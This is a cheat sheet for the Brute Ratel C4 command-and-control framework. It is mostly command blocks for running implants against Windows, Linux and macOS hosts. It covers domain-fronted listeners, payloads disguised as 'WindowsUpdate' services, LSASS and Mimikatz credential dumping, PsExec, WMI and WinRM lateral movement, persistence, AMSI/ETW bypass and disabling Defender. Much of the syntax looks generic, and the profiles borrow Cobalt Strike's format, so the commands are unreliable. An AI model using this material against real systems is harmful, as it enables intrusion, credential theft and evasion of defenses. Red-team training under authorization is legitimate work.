Brute Ratel C4 Framework Cheat Sheet
Overview
Brute Ratel C4 (BRc4) is a commercial, customized command and control (C2) framework designed for red team operations and adversary simulation. It offers advanced evasion capabilities, sophisticated post-exploitation features, and professional operational security.
Warning: This is a commercial tool that requires a valid license. It is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.
Installation
License Activation
```bash
# Activate license (requires valid license key)
./brc4 --activate
# Verify license status
./brc4 --license-info
# Update license
./brc4 --update-license
```
Server Setup
```bash
# Start BRc4 server
./brc4 --server
# Start with custom configuration
./brc4 --server --config /path/to/config.json
# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```
Client Connection
```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443
# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token
```
Command Reference
Server Management
| Command | Description |
| --- | --- |
| `help` | Display help menu |
| `version` | Show version information |
| `listeners` | List active listeners |
| `badgers` | List connected badgers (agents) |
| `operators` | List connected operators |
| `exit` | Exit BRc4 server |
Listener Management
| Command | Description |
| --- | --- |
| `listener http` | Create HTTP listener |
| `listener https` | Create HTTPS listener |
| `listener dns` | Create DNS listener |
| `listener tcp` | Create TCP listener |
| `listener smb` | Create SMB listener |
| `listener stop <id>` | Stop listener |
Badger (Agent) Management
| Command | Description |
| --- | --- |
| `badger <id>` | Interact with badger |
| `badger kill <id>` | Kill badger |
| `badger sleep <time>` | Set sleep interval |
| `badger jitter <percentage>` | Set jitter percentage |
| `badger proxy <proxy>` | Set proxy for badger |
Listener Configuration
HTTP/HTTPS Listener
```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start
# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
```
DNS Listener
```bash
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
```
SMB Listener
```bash
# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start
```
TCP Listener
```bash
# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start
```
Payload Generation
Windows Badgers
```bash
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate
# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate
# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
```
Linux Badgers
```bash
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate
# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
```
macOS Badgers
```bash
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate
# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
```
Post-Exploitation Commands
System Information
```bash
# Get system information
sysinfo
# Get current user
whoami
# Get privileges
getprivs
# Get environment variables
env
# Get network interfaces
ifconfig
```
File Operations
```bash
# List directory
ls /path/to/directory
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
# Execute file
execute /path/to/executable
# Delete file
rm /path/to/file
```
Process Management
```bash
# List processes
ps
# Kill process
kill
# Migrate to process
migrate
# Inject into process
inject
# Create process
spawn
```
Network Operations
```bash
# Network connections
netstat
# ARP table
arp
# Routing table
route
# Port scan
portscan 192.168.1.0/24 80,443,3389
# Ping sweep
ping 192.168.1.0/24
```
Advanced Features
Malleable C2 Profiles
```bash
# Load malleable profile
set malleable /path/to/profile.profile
# Custom HTTP profile
http-get {
    set uri "/api/v1/status";
    client {
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```
Process Injection Techniques
```bash
# Classic DLL injection
inject-dll
# Process hollowing
hollow
# Reflective DLL loading
reflective-dll /path/to/dll.dll
# Manual DLL mapping
map-dll
# Thread hijacking
hijack-thread
```
Credential Harvesting
```bash
# Dump LSASS
lsass-dump
# Mimikatz integration
mimikatz sekurlsa::logonpasswords
# SAM dump
sam-dump
# LSA secrets
lsa-secrets
# Cached credentials
cache-dump
# Browser credentials
browser-creds
```
Lateral Movement
```bash
# WMI execution
wmi-exec 192.168.1.10 "whoami"
# PSExec
psexec 192.168.1.10 "whoami"
# SMB execution
smb-exec 192.168.1.10 "whoami"
# DCOM execution
dcom-exec 192.168.1.10 "whoami"
# WinRM execution
winrm-exec 192.168.1.10 "whoami"
```
Persistence Mechanisms
```bash
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
# Startup folder
persist-startup "C:\temp\badger.exe"
```
Evasion Techniques
Anti-Analysis
```bash
# VM detection
vm-detect
# Sandbox evasion
sandbox-evasion
# Debugger detection
debugger-detect
# Sleep evasion
sleep-evasion 300
# User interaction check
user-interaction
```
AMSI/ETW Bypass
```bash
# AMSI bypass
amsi-bypass
# ETW bypass
etw-bypass
# Disable Windows Defender
disable-defender
# Unhook DLLs
unhook-dlls
# Patch AMSI
patch-amsi
```
Traffic Obfuscation
```bash
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com
# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
```
Payload Protection
```bash
# Encrypt payload
encrypt-payload aes256
# Obfuscate strings
obfuscate-strings
# Pack executable
pack-exe upx
# Sign executable
sign-exe /path/to/cert.pfx
# Polymorphic generation
polymorphic-gen
```
Operational Security
Communication Security
```bash
# Use encrypted channels
set encryption aes256
# Certificate pinning
set cert-pinning true
# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
# Jitter configuration
set jitter 20
set jitter-type random
```
Infrastructure Management
```bash
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443
# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"
# Failover configuration
set failover-servers "backup1.com,backup2.com"
```
Logging and Monitoring
```bash
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log
# Operator tracking
set operator-logging true
# Command auditing
set command-audit true
# Session recording
set session-recording true
```
Team Operations
Multi-Operator Support
```bash
# Add operator
operator add username password
# Set operator permissions
operator permissions username read,write,execute
# Operator sessions
operator sessions
# Kick operator
operator kick username
```
Collaboration Features
```bash
# Share badger session
share-session
# Session notes
note-add "Important finding"
note-list
note-delete
# Team chat
chat "Message to team"
chat-history
```
Troubleshooting
Connection Issues
```bash
# Test listener
test-listener
# Check connectivity
test-connectivity
# Verify certificates
verify-cert /path/to/cert.pem
# Debug mode
set debug true
```
Badger Issues
```bash
# Badger health check
health-check
# Reset badger
reset-badger
# Badger diagnostics
diagnostics
# Force reconnect
reconnect
```
Performance Optimization
```bash
# Optimize sleep intervals
set sleep-optimization true
# Bandwidth throttling
set bandwidth-limit 1024
# Connection pooling
set connection-pooling true
# Compression
set compression gzip
```
Configuration
Server Configuration
```json
{
  "server": {
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  },
  "database": {
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  },
  "logging": {
    "level": "info",
    "file": "/var/log/brc4.log"
  }
}
```
Profile Configuration
```c
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get {
    set uri "/api/status";
    client {
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```
Resources
- Brute Ratel C4 Official Website
- BRc4 Documentation
- Red Team Operations Guide
- Malleable C2 Profiles
---
*This cheat sheet provides a comprehensive reference for using Brute Ratel C4. This is a commercial tool that requires proper licensing. Always make sure you have proper authorization before using this tool in any environment.*